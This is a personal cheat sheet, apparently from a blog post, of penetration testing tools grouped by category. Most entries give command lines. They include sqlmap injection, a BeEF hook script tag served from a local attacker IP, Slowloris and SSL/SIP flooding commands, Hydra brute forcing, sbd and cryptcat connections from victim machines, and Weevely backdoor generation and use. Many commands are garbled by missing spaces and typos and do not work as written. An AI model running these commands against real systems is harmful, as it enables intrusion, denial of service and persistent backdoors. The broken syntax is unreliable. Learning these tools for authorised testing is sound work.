Over a course of time learning, i compiled a list of different tools used penetration testing and ethical hacking.

Database Tools Usage

1. sqlmap

automates the process of detecting
and exploiting SQL injection flaws and taking over of database servers

sqlmap –u victim_urlsqlmap--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686;rv:25.0) Gecko/20100101 Firefox/25.0"--cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7"-u'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#'--level=5risk=3-pid--suffix="-BR"-v3

CMS Scanning Tools

1. WPScan

wpscan--versionwpscan –u URL of webpage”.

1. Joomscan

joomscan –hjoomscan –-versionjoomscan /?joomscan –u victim_url

SSL Scanning Tools

1. TLSSLed

tlssled URL port

1. w3af

www audi framework

• start

w3af

• enter the URL of victim
• start

Exploitation Tools

1. Metasploit

msfupdatemsf> search name:Microsofttype:exploit.

1. Armitage

MetaGUI

1. BeEF

beef-xss

username and password: beef.

<scriptsrc="http://192.168.1.101:3000/hook.js"type="text/javascript"></script>

1. Linux Exploit Suggester

root@parrot:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

Forensics Tools

1. p0fidentify the operating system of a target host simply by examiningcaptured packets

In the hands of advanced users, P0f can detect firewall
presence, NAT use, and existence of load balancers.

p0f –-versionp0f-hp0f –i eth0 –p-o filename

• open 192.168.1.2

1. pdf-parser

parses a PDF document to identify the fundamental elements used
in the analyzed pdf

pdf-parser-o 10 filepath

1. dumpzilla

extract all forensic

interesting information of Firefox, Iceweasel, and Seamonkey browsers

1. ddrescue

copies data from one file or block device (hard disc, cdrom, etc.) to another, trying to
rescue the good parts first in case of read errors.

dd_rescue infilepath outfilepathdd_rescue-v /dev/sdb ~/sec.img

1. DFF

dff-gui

Social Engineering

1. Social Engineering Toolkit

sudoaptinstallsendmailvim config/set_config# SENDMAIL=OFF flag to SENDMAIL=ON.

Stressing Tools

DoS attacks or to create the stress test for different
applications so as take appropriate measures for the future.

1. Slowhttptest

slowhttptest--versionslowhttptest-h# sampelslowhttptest-c 500-H-g-o outputfile-i 10-r 200-t GET –u http://192.168.1.202/index.php-x 24-p 2

Where,
(-c 500) = 500 connections
(-H) = Slowloris mode
-g = Generate statistics
-o outputfile = Output file name
-i 10 = Use 10 seconds to wait for data
-r 200 = 200 connections with -t GET = GET requests
-uhttp://192.168.1.202/index.php = target URL-x 24 = maximum of length of 24 bytes
-p 2 = 2-second timeout

1. Inviteflood

SIP/SDP INVITE message flooding over UDP/IP.

inviteflood--version# formatinviteflood eth0 target_extension target_domain target_ip number_of_packets# sampleinviteflood eth0 2000 192.168.x.x 192.168.x.x 1

Where,
target_extension is 2000
target_domain is 192.168.x.x
target_ip is 192.168.x.x
number_of_packets is 1
-a is alias of SIP account

1. Iaxflood

VoIP DoS tool

iaxflood –-versioniaxflood –hiaxflood sourcename destinationname numpacketsiaxflood ip_src ip_dest packets

1. thc-ssl-dos

verify the performance of SSL
Establishing a secure SSL connection requires 15x more processing power on the server than on the client.

# formatthc-ssl-dos victimIP httpsport –accept# exampthc-ssl-dos 192.168.1.1 443 –accept

Sniffing & Spoofing

1. Burpsuite

sniffing tool between your browser and the webservers to find
the parameters that the web application uses

1. mitmproxy

SSL-capable man-in-the-middle HTTP proxy.

mitmproxy –-versionmitmproxy –hmitmproxy –p portnumbermitmproxy –p 80

1. Wireshark

2. sslstrip

MITM attack that forces a victim's browser to communicate in plain-text over HTTP

sslstrip--versionsslstrip-hsslstrip-p 80

Password Cracking Tools

1. Hydra

login cracker that supports many protocols to attack

hydra-l /usr/share/wordlists/metasploit/user-P /usr/share/wordlists/metasploit/passwords ftp://192.168.1.101 –V

1. Johnny

GUI for the John the Ripper password cracking tool

1. John

CLI for Johnny GUI.

unshadow passwd shadow> unshadowed.txt

1. Rainbowcrackcracks hashes by rainbow table lookup.

rcrack-hrcrack path_to_rainbow_tables-f path_to_password_hashrcrack path_to_rainbow_tables-f path_to_password_hash./rcrack.-h 5d41402abc4b2a76b9719d911017c592./rcrack.-l hash.txt

1. SQLdict

dictionary attack tool for SQL server

sqldict

• Under “Target IP Server”,
• Under “Target Account”, enter the username.
• load the file with the password
• start

1. hash-identifier

identify types of hashes

hash-identifier 5d41402abc4b2a76b9719d911017c592

Maintaining Access

uses to maintain connection and for access to
a hacked machine even when it connects and disconnects again.

1. Powersploit

help to connect with the victim’s machine via PowerShell.

cd /usr/share/powersploit/

1. Sbd

similar to Netcat
features AES-CBC-128 + HMAC-SHA1 encryption

# serversbd-l-p 44# visctimsbd 192.168.43.2 44

1. Weevely

PHP web shell that simulate telnet-like connection
used as a stealth backdoor

# checkweevely-h# formatweevely generate password pathoffile# sampleweevely generate adm1n123 ~/Desktop/about1.php# formartweevely URL password# sampleweevely http://198.168.32.13 adm1n123

1. http-tunnel

creates a bidirectional virtual data stream tunneled in HTTP requests
This can be useful for users behind restrictive firewalls.

# serverhttptunnel_server –h# clienthttptunnel_client –h

1. cryptcat

similar to Netcat which allows to make TCP and UDP connection with a victim’s
machine in an encrypted way

# servercryptcat –l –p port –n# clientcryptcat IPofServer PortofServer

Reverse Engineering

1. OllyDbg

32-bit assembler level analyzing debugger for MS Windows applications
used to crack the commercial softwares.

• start

ollydbg

1. dex2jar

convert APK file (android) to JAR file in order to view the source code.

d2j-dex2jar –d /file locationd2j-dex2jar –d ~/Desktop/class.dex

1. jd-gui

standalone graphical utility that displays Java source codes of “.class” files.

jd-gui

1. apktool

best tools to reverse the whole android application

apktool# decompileapktool d apk file

Reporting Tools

1. Dradis

service dradis startdradis

• openhttps://machine_ip:3004
• import files from NMAP, NESSUS, NEXPOSE

1. Metagoofil

search in Google to identify and download the documents to the local
disk and then extracts the metadata

# helpmetagoofil-hmetagoofil-d udsm-t docx-l 3-o ~/Downloads-f ~/Downloads/metagoofil_res

• –d (domain name)
• –t (filetype to download dox,pdf,etc)
• –l (limit the results 10, 100 )–n (limit files to download)
• –o ( location to save the files)
• –f (output file)

Misc

1. strace

# samplestrace –etrace=network,read,write /path/to/app args# examplestrace-etrace=network,read,write customapp